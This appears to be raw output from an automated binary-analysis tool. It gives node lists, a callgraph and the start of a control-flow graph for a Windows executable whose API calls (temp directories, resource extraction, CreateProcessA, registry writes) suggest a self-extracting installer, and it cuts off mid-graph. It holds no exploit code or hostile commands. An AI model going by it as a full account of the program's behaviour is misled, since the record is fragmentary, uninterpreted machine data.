2525 1a44b9 20 API calls 2524->2525 2526 1a61e7 2525->2526 2527 1a61f0 CloseHandle 2526->2527 2528 1a61f7 ExitProcess 2526->2528 2527->2528 2529 1a5f9f CharUpperA 2529->2535 2530 1a5f59 CompareStringA 2530->2535 2531 1a6003 CharUpperA 2531->2535 2532 1a5edc CharUpperA 2532->2535 2533 1a60a2 CharUpperA 2533->2535 2534 1a667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2514 2535->2518 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 1a658a 2535->2592 2538 1a24cb 2537->2538 2541 1a23b9 2537->2541 2539 1a6ce0 4 API calls 2538->2539 2540 1a24dc 2539->2540 2540->2423 2541->2538 2542 1a23e9 FindFirstFileA 2541->2542 2542->2538 2550 1a2407 2542->2550 2543 1a2479 2547 1a2488 SetFileAttributesA DeleteFileA 2543->2547 2544 1a2421 lstrcmpA 2545 1a24a9 FindNextFileA 2544->2545 2546 1a2431 lstrcmpA 2544->2546 2548 1a24bd FindClose RemoveDirectoryA 2545->2548 2545->2550 2546->2545 2546->2550 2547->2545 2548->2538 2549 1a658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 1a2390 5 API calls 2550->2551 2551->2550 2556 1a3737 2552->2556 2557 1a372d 2552->2557 2553 1a44b9 20 API calls 2566 1a39fc 2553->2566 2554 1a6ce0 4 API calls 2555 1a2e92 2554->2555 2555->2403 2555->2423 2567 1a18a3 2555->2567 2556->2557 2559 1a38a4 2556->2559 2556->2566 2603 1a28e8 2556->2603 2557->2553 2557->2566 2559->2557 2560 1a39c1 MessageBeep 2559->2560 2559->2566 2561 1a681f 10 API calls 2560->2561 2562 1a39ce 2561->2562 2563 1a39d8 MessageBoxA 2562->2563 2564 1a67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 1a19b8 2567->2568 2569 1a18d5 2567->2569 2570 1a6ce0 4 API calls 2568->2570 2632 1a17ee LoadLibraryA 2569->2632 2572 1a19d5 2570->2572 2572->2423 2572->2435 2574 1a18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 1a1900 GetTokenInformation 2574->2575 2576 1a19aa CloseHandle 2575->2576 2577 1a1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 1a1927 LocalAlloc 2577->2578 2579 1a1938 GetTokenInformation 2578->2579 2580 1a19a9 2578->2580 2581 1a194e AllocateAndInitializeSid 2579->2581 2582 1a19a2 LocalFree 2579->2582 2580->2576 2581->2582 2586 1a196e 2581->2586 2582->2580 2583 1a1999 FreeSid 2583->2582 2584 1a1975 EqualSid 2585 1a198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 1a66d5 2587->2588 2589 1a66f3 2588->2589 2591 1a66e5 CharNextA 2588->2591 2599 1a6648 2588->2599 2589->2518 2591->2588 2593 1a659b 2592->2593 2593->2593 2594 1a65b8 CharPrevA 2593->2594 2595 1a65ab 2593->2595 2594->2595 2595->2535 2602 1a6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 1a621d 2600 1a665d IsDBCSLeadByte 2599->2600 2601 1a6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 1a2a62 2603->2604 2611 1a290d 2603->2611 2605 1a2a6e GlobalFree 2604->2605 2606 1a2a75 2604->2606 2605->2606 2606->2559 2608 1a2955 GlobalAlloc 2608->2604 2609 1a2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 1a2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 1a2a80 GlobalUnlock 2611->2612 2613 1a2773 2611->2613 2612->2604 2614 1a28b2 2613->2614 2615 1a27a3 CharUpperA CharNextA CharNextA 2613->2615 2617 1a28b7 GetSystemDirectoryA 2614->2617 2616 1a27db 2615->2616 2615->2617 2618 1a28a8 GetWindowsDirectoryA 2616->2618 2620 1a27e3 2616->2620 2619 1a28bf 2617->2619 2618->2619 2621 1a28d2 2619->2621 2622 1a658a CharPrevA 2619->2622 2624 1a658a CharPrevA 2620->2624 2623 1a6ce0 4 API calls 2621->2623 2622->2621 2625 1a28e2 2623->2625 2626 1a2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 1a2837 RegQueryValueExA 2626->2627 2628 1a289a RegCloseKey 2627->2628 2629 1a285c 2627->2629 2628->2619 2630 1a2867 ExpandEnvironmentStringsA 2629->2630 2631 1a287a 2629->2631 2630->2631 2631->2628 2633 1a1890 2632->2633 2634 1a1826 GetProcAddress 2632->2634 2635 1a6ce0 4 API calls 2633->2635 2636 1a1889 FreeLibrary 2634->2636 2637 1a1839 AllocateAndInitializeSid 2634->2637 2638 1a189f 2635->2638 2636->2633 2637->2636 2639 1a185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 1a468f 7 API calls 2641->2642 2643 1a51f9 LocalAlloc 2642->2643 2644 1a522d 2643->2644 2645 1a520d 2643->2645 2647 1a468f 7 API calls 2644->2647 2646 1a44b9 20 API calls 2645->2646 2648 1a521e 2646->2648 2649 1a523a 2647->2649 2650 1a6285 GetLastError 2648->2650 2651 1a523e 2649->2651 2652 1a5262 lstrcmpA 2649->2652 2658 1a2f4d 2650->2658 2655 1a44b9 20 API calls 2651->2655 2653 1a527e 2652->2653 2654 1a5272 LocalFree 2652->2654 2656 1a44b9 20 API calls 2653->2656 2654->2658 2657 1a524f LocalFree 2655->2657 2659 1a5290 LocalFree 2656->2659 2657->2658 2658->2438 2658->2439 2658->2444 2659->2658 2661 1a468f 7 API calls 2660->2661 2662 1a5175 2661->2662 2663 1a517a 2662->2663 2664 1a51af 2662->2664 2665 1a44b9 20 API calls 2663->2665 2666 1a468f 7 API calls 2664->2666 2667 1a518d 2665->2667 2668 1a51c0 2666->2668 2667->2441 2822 1a6298 2668->2822 2671 1a51e1 2671->2441 2672 1a44b9 20 API calls 2672->2667 2674 1a468f 7 API calls 2673->2674 2675 1a55c7 LocalAlloc 2674->2675 2676 1a55db 2675->2676 2677 1a55fd 2675->2677 2678 1a44b9 20 API calls 2676->2678 2679 1a468f 7 API calls 2677->2679 2680 1a55ec 2678->2680 2681 1a560a 2679->2681 2682 1a6285 GetLastError 2680->2682 2683 1a560e 2681->2683 2684 1a5632 lstrcmpA 2681->2684 2709 1a55f1 2682->2709 2685 1a44b9 20 API calls 2683->2685 2686 1a564b LocalFree 2684->2686 2687 1a5645 2684->2687 2688 1a561f LocalFree 2685->2688 2689 1a565b 2686->2689 2690 1a5696 2686->2690 2687->2686 2688->2709 2697 1a5467 49 API calls 2689->2697 2691 1a589f 2690->2691 2692 1a56ae GetTempPathA 2690->2692 2693 1a6517 24 API calls 2691->2693 2695 1a56eb 2692->2695 2696 1a56c3 2692->2696 2693->2709 2694 1a6ce0 4 API calls 2698 1a2f7e 2694->2698 2703 1a586c GetWindowsDirectoryA 2695->2703 2704 1a5717 GetDriveTypeA 2695->2704 2695->2709 2834 1a5467 2696->2834 2700 1a5678 2697->2700 2698->2444 2698->2450 2702 1a44b9 20 API calls 2700->2702 2700->2709 2702->2709 2868 1a597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2707 1a5730 GetFileAttributesA 2704->2707 2714 1a572b 2704->2714 2707->2714 2709->2694 2710 1a597d 34 API calls 2710->2714 2711 1a5467 49 API calls 2711->2695 2712 1a2630 21 API calls 2712->2714 2714->2703 2714->2704 2714->2707 2714->2709 2714->2710 2714->2712 2715 1a57c1 GetWindowsDirectoryA 2714->2715 2716 1a658a CharPrevA 2714->2716 2719 1a5827 SetFileAttributesA 2714->2719 2720 1a5467 49 API calls 2714->2720 2864 1a6952 2714->2864 2715->2714 2717 1a57e8 GetFileAttributesA 2716->2717 2717->2714 2718 1a57fa CreateDirectoryA 2717->2718 2718->2714 2719->2714 2720->2714 2722 1a6268 2721->2722 2723 1a6249 2721->2723 2725 1a597d 34 API calls 2722->2725 2724 1a44b9 20 API calls 2723->2724 2726 1a625a 2724->2726 2730 1a625f 2725->2730 2728 1a6285 GetLastError 2726->2728 2727 1a6ce0 4 API calls 2729 1a3013 2727->2729 2728->2730 2729->2444 2729->2458 2730->2727 2732 1a3b2d 2731->2732 2732->2732 2733 1a3b72 2732->2733 2735 1a3b53 2732->2735 2934 1a4fe0 2733->2934 2736 1a6517 24 API calls 2735->2736 2737 1a3b70 2736->2737 2738 1a6298 10 API calls 2737->2738 2739 1a3b7b 2737->2739 2738->2739 2739->2463 2741 1a2622 2740->2741 2742 1a2583 2740->2742 2961 1a24e0 GetWindowsDirectoryA 2741->2961 2744 1a258b 2742->2744 2745 1a25e8 RegOpenKeyExA 2742->2745 2746 1a25e3 2744->2746 2749 1a259b RegOpenKeyExA 2744->2749 2745->2746 2747 1a2609 RegQueryInfoKeyA 2745->2747 2746->2465 2748 1a25d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1a25bc RegQueryValueExA 2749->2750 2750->2748 2752 1a3bdb 2751->2752 2764 1a3bec 2751->2764 2753 1a468f 7 API calls 2752->2753 2753->2764 2754 1a3c03 memset 2754->2764 2755 1a3d13 2757 1a44b9 20 API calls 2755->2757 2756 1a468f 7 API calls 2756->2764 2763 1a3d26 2757->2763 2759 1a6ce0 4 API calls 2760 1a3f60 2759->2760 2760->2471 2761 1a3fd7 2761->2763 3060 1a2267 2761->3060 2762 1a3d7b CompareStringA 2762->2761 2762->2764 2763->2759 2764->2754 2764->2755 2764->2756 2764->2761 2764->2762 2764->2763 2765 1a3fab 2764->2765 2769 1a3f1e LocalFree 2764->2769 2770 1a3f46 LocalFree 2764->2770 2774 1a3cc7 CompareStringA 2764->2774 2785 1a3e10 2764->2785 2969 1a1ae8 2764->2969 3010 1a202a memset memset RegCreateKeyExA 2764->3010 3036 1a3fef 2764->3036 2768 1a44b9 20 API calls 2765->2768 2772 1a3fbe LocalFree 2768->2772 2769->2761 2769->2764 2770->2763 2772->2763 2774->2764 2775 1a3e1f GetProcAddress 2777 1a3f64 2775->2777 2775->2785 2776 1a3f92 2778 1a44b9 20 API calls 2776->2778 2780 1a44b9 20 API calls 2777->2780 2779 1a3fa9 2778->2779 2781 1a3f7c LocalFree 2779->2781 2782 1a3f75 FreeLibrary 2780->2782 2783 1a6285 GetLastError 2781->2783 2782->2781 2784 1a3f8b 2783->2784 2784->2763 2785->2775 2785->2776 2786 1a3eff FreeLibrary 2785->2786 2787 1a3f40 FreeLibrary 2785->2787 3050 1a6495 2785->3050 2786->2769 2787->2770 2789 1a468f 7 API calls 2788->2789 2790 1a3a55 LocalAlloc 2789->2790 2791 1a3a8e 2790->2791 2792 1a3a6c 2790->2792 2794 1a468f 7 API calls 2791->2794 2793 1a44b9 20 API calls 2792->2793 2795 1a3a7d 2793->2795 2796 1a3a98 2794->2796 2797 1a6285 GetLastError 2795->2797 2798 1a3a9c 2796->2798 2799 1a3ac5 lstrcmpA 2796->2799 2800 1a2f64 2797->2800 2801 1a44b9 20 API calls 2798->2801 2802 1a3ada 2799->2802 2803 1a3b0d LocalFree 2799->2803 2800->2438 2800->2444 2805 1a3aad LocalFree 2801->2805 2804 1a6517 24 API calls 2802->2804 2803->2800 2806 1a3aec LocalFree 2804->2806 2805->2800 2806->2800 2808 1a628f 2807->2808 2808->2444 2810 1a468f 7 API calls 2809->2810 2811 1a417d LocalAlloc 2810->2811 2812 1a41a8 2811->2812 2813 1a4195 2811->2813 2815 1a468f 7 API calls 2812->2815 2814 1a44b9 20 API calls 2813->2814 2816 1a41a6 2814->2816 2817 1a41b5 2815->2817 2816->2444 2818 1a41b9 2817->2818 2819 1a41c5 lstrcmpA 2817->2819 2821 1a44b9 20 API calls 2818->2821 2819->2818 2820 1a41e6 LocalFree 2819->2820 2820->2816 2821->2820 2823 1a171e _vsnprintf 2822->2823 2824 1a62c9 FindResourceA 2823->2824 2826 1a62cb LoadResource LockResource 2824->2826 2827 1a6353 2824->2827 2826->2827 2830 1a62e0 2826->2830 2828 1a6ce0 4 API calls 2827->2828 2829 1a51ca 2828->2829 2829->2671 2829->2672 2831 1a631b FreeResource 2830->2831 2832 1a6355 FreeResource 2830->2832 2833 1a171e _vsnprintf 2831->2833 2832->2827 2833->2824 2835 1a548a 2834->2835 2836 1a551a 2834->2836 2894 1a53a1 2835->2894 2905 1a58c8 2836->2905 2838 1a5495 2847 1a5581 2838->2847 2848 1a550c 2838->2848 2849 1a54c2 GetSystemInfo 2838->2849 2841 1a553b CreateDirectoryA 2845 1a5577 2841->2845 2846 1a5547 2841->2846 2842 1a554d 2842->2847 2850 1a597d 34 API calls 2842->2850 2843 1a6ce0 4 API calls 2844 1a559a 2843->2844 2844->2709 2858 1a2630 GetWindowsDirectoryA 2844->2858 2851 1a6285 GetLastError 2845->2851 2846->2842 2847->2843 2852 1a658a CharPrevA 2848->2852 2856 1a54da 2849->2856 2853 1a555c 2850->2853 2854 1a557c 2851->2854 2852->2836 2853->2847 2857 1a5568 RemoveDirectoryA 2853->2857 2854->2847 2855 1a658a CharPrevA 2855->2848 2856->2848 2856->2855 2857->2847 2859 1a265e 2858->2859 2860 1a266f 2858->2860 2861 1a44b9 20 API calls 2859->2861 2862 1a6ce0 4 API calls 2860->2862 2861->2860 2863 1a2687 2862->2863 2863->2695 2863->2711 2865 1a696e GetDiskFreeSpaceA 2864->2865 2866 1a69a1 2864->2866 2865->2866 2867 1a6989 MulDiv 2865->2867 2866->2714 2867->2866 2869 1a59bb 2868->2869 2870 1a59dd GetDiskFreeSpaceA 2868->2870 2871 1a44b9 20 API calls 2869->2871 2872 1a5ba1 memset 2870->2872 2873 1a5a21 MulDiv 2870->2873 2874 1a59cc 2871->2874 2875 1a6285 GetLastError 2872->2875 2873->2872 2876 1a5a50 GetVolumeInformationA 2873->2876 2877 1a6285 GetLastError 2874->2877 2878 1a5bbc GetLastError FormatMessageA 2875->2878 2879 1a5a6e memset 2876->2879 2880 1a5ab5 SetCurrentDirectoryA 2876->2880 2881 1a59d1 2877->2881 2882 1a5be3 2878->2882 2883 1a6285 GetLastError 2879->2883 2888 1a5acc 2880->2888 2887 1a6ce0 4 API calls 2881->2887 2884 1a44b9 20 API calls 2882->2884 2885 1a5a89 GetLastError FormatMessageA 2883->2885 2886 1a5bf5 SetCurrentDirectoryA 2884->2886 2885->2882 2886->2881 2889 1a5c11 2887->2889 2890 1a5b0a 2888->2890 2892 1a5b20 2888->2892 2889->2695 2891 1a44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 1a268b 2892->2917 2896 1a53bf 2894->2896 2895 1a171e _vsnprintf 2895->2896 2896->2895 2897 1a658a CharPrevA 2896->2897 2900 1a5415 GetTempFileNameA 2896->2900 2898 1a53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 1a544f CreateDirectoryA 2898->2899 2899->2900 2901 1a543a 2899->2901 2900->2901 2902 1a5429 DeleteFileA CreateDirectoryA 2900->2902 2903 1a6ce0 4 API calls 2901->2903 2902->2901 2904 1a5449 2903->2904 2904->2838 2906 1a58d8 2905->2906 2906->2906 2907 1a58df LocalAlloc 2906->2907 2908 1a5919 2907->2908 2909 1a58f3 2907->2909 2912 1a658a CharPrevA 2908->2912 2910 1a44b9 20 API calls 2909->2910 2911 1a5906 2910->2911 2913 1a6285 GetLastError 2911->2913 2915 1a5534 2911->2915 2914 1a5931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 1a595b CloseHandle GetFileAttributesA 2914->2916 2915->2841 2915->2842 2916->2911 2918 1a26b9 2917->2918 2919 1a26e5 2917->2919 2922 1a171e _vsnprintf 2918->2922 2920 1a26ea 2919->2920 2921 1a271f 2919->2921 2923 1a171e _vsnprintf 2920->2923 2924 1a26e3 2921->2924 2927 1a171e _vsnprintf 2921->2927 2925 1a26cc 2922->2925 2926 1a26fd 2923->2926 2928 1a6ce0 4 API calls 2924->2928 2929 1a44b9 20 API calls 2925->2929 2931 1a44b9 20 API calls 2926->2931 2932 1a2735 2927->2932 2930 1a276d 2928->2930 2929->2924 2930->2881 2931->2924 2933 1a44b9 20 API calls 2932->2933 2933->2924 2935 1a468f 7 API calls 2934->2935 2936 1a4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 1a5020 2936->2937 2949 1a515f 2936->2949 2938 1a5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2938 2939 1a5057 2937->2939 2938->2939 2953 1a4efd 2939->2953 2942 1a507c 2947 1a44b9 20 API calls 2942->2947 2948 1a5075 2942->2948 2943 1a5060 2944 1a44b9 20 API calls 2943->2944 2944->2948 2945 1a511d 2950 1a513a 2945->2950 2951 1a44b9 20 API calls 2945->2951 2946 1a5110 FreeResource 2946->2945 2947->2948 2948->2945 2948->2946 2949->2737 2950->2949 2952 1a514c SendMessageA 2950->2952 2951->2950 2952->2949 2954 1a4f4a 2953->2954 2955 1a4980 25 API calls 2954->2955 2960 1a4fa1 2954->2960 2958 1a4f67 2955->2958 2956 1a6ce0 4 API calls 2957 1a4fc6 2956->2957 2957->2942 2957->2943 2959 1a4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 1a255b 2961->2962 2963 1a2510 2961->2963 2964 1a6ce0 4 API calls 2962->2964 2965 1a658a CharPrevA 2963->2965 2966 1a2569 2964->2966 2967 1a2522 WritePrivateProfileStringA _lopen 2965->2967 2966->2746 2967->2962 2968 1a2548 _llseek _lclose 2967->2968 2968->2962 2970 1a1b25 2969->2970 3074 1a1a84 2970->3074 2972 1a1b57 2973 1a658a CharPrevA 2972->2973 2975 1a1b8c 2972->2975 2973->2975 2974 1a66c8 2 API calls 2976 1a1bd1 2974->2976 2975->2974 2977 1a1bd9 CompareStringA 2976->2977 2978 1a1d73 2976->2978 2977->2978 2979 1a1bf7 GetFileAttributesA 2977->2979 2980 1a66c8 2 API calls 2978->2980 2981 1a1c0d 2979->2981 2982 1a1d53 2979->2982 2983 1a1d7d 2980->2983 2981->2982 2989 1a1a84 2 API calls 2981->2989 2984 1a1d64 2982->2984 2985 1a1df8 LocalAlloc 2983->2985 2986 1a1d81 CompareStringA 2983->2986 2987 1a44b9 20 API calls 2984->2987 2985->2984 2988 1a1e0b GetFileAttributesA 2985->2988 2986->2985 2994 1a1d9b 2986->2994 2990 1a1d6c 2987->2990 2997 1a1e1d 2988->2997 3005 1a1e45 2988->3005 2991 1a1c31 2989->2991 2993 1a6ce0 4 API calls 2990->2993 2992 1a1c50 LocalAlloc 2991->2992 2998 1a1a84 2 API calls 2991->2998 2992->2984 2995 1a1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2992->2995 2996 1a1ea1 2993->2996 2994->2994 2999 1a1dbe LocalAlloc 2994->2999 3002 1a1cf8 2995->3002 3003 1a1cc2 2995->3003 2996->2764 2997->3005 2998->2992 2999->2984 3004 1a1de1 2999->3004 3006 1a1d09 GetShortPathNameA 3002->3006 3007 1a1d23 3002->3007 3003->2990 3008 1a171e _vsnprintf 3004->3008 3080 1a2aac 3005->3080 3006->3007 3009 1a171e _vsnprintf 3007->3009 3008->3003 3009->3003 3011 1a209a 3010->3011 3012 1a2256 3010->3012 3014 1a171e _vsnprintf 3011->3014 3017 1a20dc 3011->3017 3013 1a6ce0 4 API calls 3012->3013 3015 1a2263 3013->3015 3016 1a20af RegQueryValueExA 3014->3016 3015->2764 3016->3011 3016->3017 3018 1a20fb GetSystemDirectoryA 3017->3018 3019 1a20e4 RegCloseKey 3017->3019 3020 1a658a CharPrevA 3018->3020 3019->3012 3021 1a211b LoadLibraryA 3020->3021 3022 1a2179 GetModuleFileNameA 3021->3022 3023 1a212e GetProcAddress FreeLibrary 3021->3023 3024 1a21de RegCloseKey 3022->3024 3028 1a2177 3022->3028 3023->3022 3025 1a214e GetSystemDirectoryA 3023->3025 3024->3012 3026 1a2165 3025->3026 3025->3028 3027 1a658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1a21b7 LocalAlloc 3028->3029 3030 1a21ec 3029->3030 3031 1a21cd 3029->3031 3033 1a171e _vsnprintf 3030->3033 3032 1a44b9 20 API calls 3031->3032 3032->3024 3034 1a2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 1a4106 3036->3037 3038 1a4016 CreateProcessA 3036->3038 3041 1a6ce0 4 API calls 3037->3041 3039 1a4041 WaitForSingleObject GetExitCodeProcess 3038->3039 3040 1a40c4 3038->3040 3048 1a4070 3039->3048 3043 1a6285 GetLastError 3040->3043 3042 1a4117 3041->3042 3042->2764 3044 1a40c9 GetLastError FormatMessageA 3043->3044 3046 1a44b9 20 API calls 3044->3046 3046->3037 3047 1a4096 CloseHandle CloseHandle 3047->3037 3049 1a40ba 3047->3049 3107 1a411b 3048->3107 3049->3037 3051 1a64c2 3050->3051 3052 1a658a CharPrevA 3051->3052 3053 1a64d8 GetFileAttributesA 3052->3053 3054 1a64ea 3053->3054 3055 1a6501 LoadLibraryA 3053->3055 3054->3055 3056 1a64ee LoadLibraryExA 3054->3056 3057 1a6508 3055->3057 3056->3057 3058 1a6ce0 4 API calls 3057->3058 3059 1a6513 3058->3059 3059->2785 3061 1a2289 RegOpenKeyExA 3060->3061 3062 1a2381 3060->3062 3061->3062 3063 1a22b1 RegQueryValueExA 3061->3063 3064 1a6ce0 4 API calls 3062->3064 3066 1a22e6 memset GetSystemDirectoryA 3063->3066 3067 1a2374 RegCloseKey 3063->3067 3065 1a238c 3064->3065 3065->2763 3068 1a230f 3066->3068 3069 1a2321 3066->3069 3067->3062 3070 1a658a CharPrevA 3068->3070 3071 1a171e _vsnprintf 3069->3071 3070->3069 3072 1a233f RegSetValueExA 3071->3072 3072->3067 3077 1a1a9a 3074->3077 3076 1a1aba 3076->2972 3077->3076 3078 1a1aaf 3077->3078 3093 1a667f 3077->3093 3078->3076 3079 1a667f 2 API calls 3078->3079 3079->3078 3081 1a2be6 3080->3081 3082 1a2ad4 GetModuleFileNameA 3080->3082 3083 1a6ce0 4 API calls 3081->3083 3092 1a2b02 3082->3092 3085 1a2bf5 3083->3085 3084 1a2af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 1a2bca CharNextA 3089 1a2bd3 CharNextA 3086->3089 3087 1a2b11 CharNextA CharUpperA 3088 1a2b8d CharUpperA 3087->3088 3087->3092 3088->3092 3089->3092 3091 1a2b43 CharPrevA 3091->3092 3092->3081 3092->3084 3092->3086 3092->3087 3092->3089 3092->3091 3098 1a65e8 3092->3098 3096 1a6689 3093->3096 3094 1a66a5 3094->3077 3095 1a6648 IsDBCSLeadByte 3095->3096 3096->3094 3096->3095 3097 1a6697 CharNextA 3096->3097 3097->3096 3099 1a65f4 3098->3099 3099->3099 3100 1a65fb CharPrevA 3099->3100 3101 1a6611 CharPrevA 3100->3101 3102 1a660b 3101->3102 3103 1a661e 3101->3103 3102->3101 3102->3103 3104 1a6627 CharPrevA 3103->3104 3105 1a6634 CharNextA 3103->3105 3106 1a663d 3103->3106 3104->3105 3104->3106 3105->3106 3106->3092 3108 1a4132 3107->3108 3110 1a412a 3107->3110 3111 1a1ea7 3108->3111 3110->3047 3112 1a1eba 3111->3112 3113 1a1ed3 3111->3113 3114 1a256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 1a1ff0 RegOpenKeyExA 3115->3116 3117 1a2026 3115->3117 3116->3117 3118 1a200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3267 1a6a20 __getmainargs 3268 1a19e0 3269 1a1a03 3268->3269 3270 1a1a24 GetDesktopWindow 3268->3270 3271 1a1a20 3269->3271 3273 1a1a16 EndDialog 3269->3273 3272 1a43d0 11 API calls 3270->3272 3275 1a6ce0 4 API calls 3271->3275 3274 1a1a33 LoadStringA SetDlgItemTextA MessageBeep 3272->3274 3273->3271 3274->3271 3276 1a1a7e 3275->3276

                                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                                              callgraph 0 Function_001A411B 83 Function_001A1EA7 0->83 1 Function_001A171E 2 Function_001A621E 36 Function_001A597D 2->36 67 Function_001A6285 2->67 68 Function_001A44B9 2->68 114 Function_001A6CE0 2->114 3 Function_001A681F 97 Function_001A66F9 3->97 3->114 4 Function_001A2F1D 4->2 16 Function_001A3A3F 4->16 24 Function_001A3B26 4->24 40 Function_001A4169 4->40 41 Function_001A256D 4->41 49 Function_001A5164 4->49 57 Function_001A658A 4->57 4->67 4->68 76 Function_001A3BA2 4->76 79 Function_001A55A0 4->79 4->114 119 Function_001A51E5 4->119 5 Function_001A3210 25 Function_001A4224 5->25 5->36 5->57 5->68 87 Function_001A43D0 5->87 88 Function_001A58C8 5->88 6 Function_001A7010 7 Function_001A5C17 8 Function_001A6517 8->68 9 Function_001A7208 10 Function_001A490C 11 Function_001A4702 62 Function_001A1680 11->62 70 Function_001A16B3 11->70 12 Function_001A6C03 32 Function_001A724D 12->32 13 Function_001A7000 14 Function_001A4200 15 Function_001A3100 15->87 16->8 60 Function_001A468F 16->60 16->67 16->68 17 Function_001A6C3F 18 Function_001A2630 18->68 18->114 19 Function_001A4C37 20 Function_001A6E2A 100 Function_001A6CF0 20->100 21 Function_001A202A 21->1 21->57 21->68 21->114 22 Function_001A7120 23 Function_001A6A20 24->8 50 Function_001A6298 24->50 112 Function_001A4FE0 24->112 25->62 25->68 26 Function_001A6952 27 Function_001A3450 27->87 28 Function_001A4A50 29 Function_001A6F54 29->9 29->32 30 Function_001A7155 31 Function_001A6648 33 Function_001A6F40 34 Function_001A487A 34->10 35 Function_001A667F 35->31 58 Function_001A268B 36->58 36->67 36->68 36->114 37 Function_001A2773 37->57 37->62 65 Function_001A1781 37->65 37->114 38 Function_001A7270 39 Function_001A6C70 40->60 40->68 113 Function_001A24E0 41->113 42 Function_001A476D 42->8 74 Function_001A66AE 42->74 43 Function_001A4B60 44 Function_001A6A60 44->9 44->17 44->30 44->32 45 Function_001A7060 44->45 96 Function_001A2BFB 44->96 45->6 45->22 46 Function_001A6760 47 Function_001A5467 47->36 47->57 47->62 47->65 47->67 81 Function_001A53A1 47->81 47->88 47->114 48 Function_001A2267 48->1 48->57 48->114 49->50 49->60 49->68 50->1 50->114 51 Function_001A4E99 51->62 52 Function_001A5C9E 52->7 52->20 52->35 52->57 52->62 52->68 89 Function_001A66C8 52->89 52->114 115 Function_001A31E0 52->115 53 Function_001A6793 54 Function_001A2390 54->54 54->57 54->62 54->70 54->114 55 Function_001A1F90 55->68 55->83 55->114 56 Function_001A6495 56->57 56->65 56->114 57->70 58->1 58->68 58->114 59 Function_001A2A89 61 Function_001A4980 61->34 61->68 62->65 63 Function_001A3680 64 Function_001A6380 66 Function_001A1A84 66->35 68->1 68->3 68->62 91 Function_001A67C9 68->91 68->114 69 Function_001A6FBE 69->29 70->65 71 Function_001A69B0 71->13 71->39 71->69 110 Function_001A71EF 71->110 72 Function_001A52B6 72->54 72->65 106 Function_001A65E8 72->106 72->114 118 Function_001A1FE1 72->118 73 Function_001A2CAA 73->8 73->52 73->54 73->60 73->68 78 Function_001A18A3 73->78 107 Function_001A36EE 73->107 73->114 75 Function_001A2AAC 75->62 90 Function_001A17C8 75->90 75->106 75->114 76->21 76->48 76->56 76->60 76->65 76->67 76->68 104 Function_001A1AE8 76->104 109 Function_001A3FEF 76->109 76->114 77 Function_001A72A2 108 Function_001A17EE 78->108 78->114 79->8 79->18 79->26 79->36 79->47 79->57 79->60 79->65 79->67 79->68 79->114 80 Function_001A4CA0 81->1 81->57 81->62 81->114 82 Function_001A6FA1 83->41 84 Function_001A6FA5 84->32 85 Function_001A4AD0 85->63 86 Function_001A4CD0 86->11 86->19 86->42 86->43 86->51 86->61 86->114 116 Function_001A47E0 86->116 87->114 88->57 88->62 88->67 88->68 89->31 91->53 92 Function_001A4CC0 93 Function_001A4BC0 94 Function_001A30C0 95 Function_001A63C0 95->57 95->65 95->114 96->4 96->55 96->72 96->73 98 Function_001A70FE 99 Function_001A4EFD 99->43 99->61 99->114 101 Function_001A34F0 101->63 101->68 101->87 102 Function_001A6EF0 103 Function_001A70EB 104->1 104->57 104->62 104->65 104->66 104->68 104->70 104->75 104->89 104->114 105 Function_001A28E8 105->37 105->59 107->3 107->59 107->68 107->91 107->105 107->114 108->114 109->0 109->67 109->68 109->114 111 Function_001A6BEF 112->60 112->68 112->99 113->57 113->114 114->100 116->62 116->68 117 Function_001A19E0 117->87 117->114 119->60 119->67 119->68

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 36 1a3ba2-1a3bd9 37 1a3bdb-1a3bee call 1a468f 36->37 38 1a3bfd-1a3bff 36->38 44 1a3d13-1a3d30 call 1a44b9 37->44 45 1a3bf4-1a3bf7 37->45 40 1a3c03-1a3c28 memset 38->40 42 1a3c2e-1a3c40 call 1a468f 40->42 43 1a3d35-1a3d48 call 1a1781 40->43 42->44 54 1a3c46-1a3c49 42->54 49 1a3d4d-1a3d52 43->49 55 1a3f4d 44->55 45->38 45->44 52 1a3d9e-1a3db6 call 1a1ae8 49->52 53 1a3d54-1a3d6c call 1a468f 49->53 52->55 69 1a3dbc-1a3dc2 52->69 53->44 65 1a3d6e-1a3d75 53->65 54->44 57 1a3c4f-1a3c56 54->57 59 1a3f4f-1a3f63 call 1a6ce0 55->59 61 1a3c58-1a3c5e 57->61 62 1a3c60-1a3c65 57->62 66 1a3c6e-1a3c73 61->66 67 1a3c67-1a3c6d 62->67 68 1a3c75-1a3c7c 62->68 71 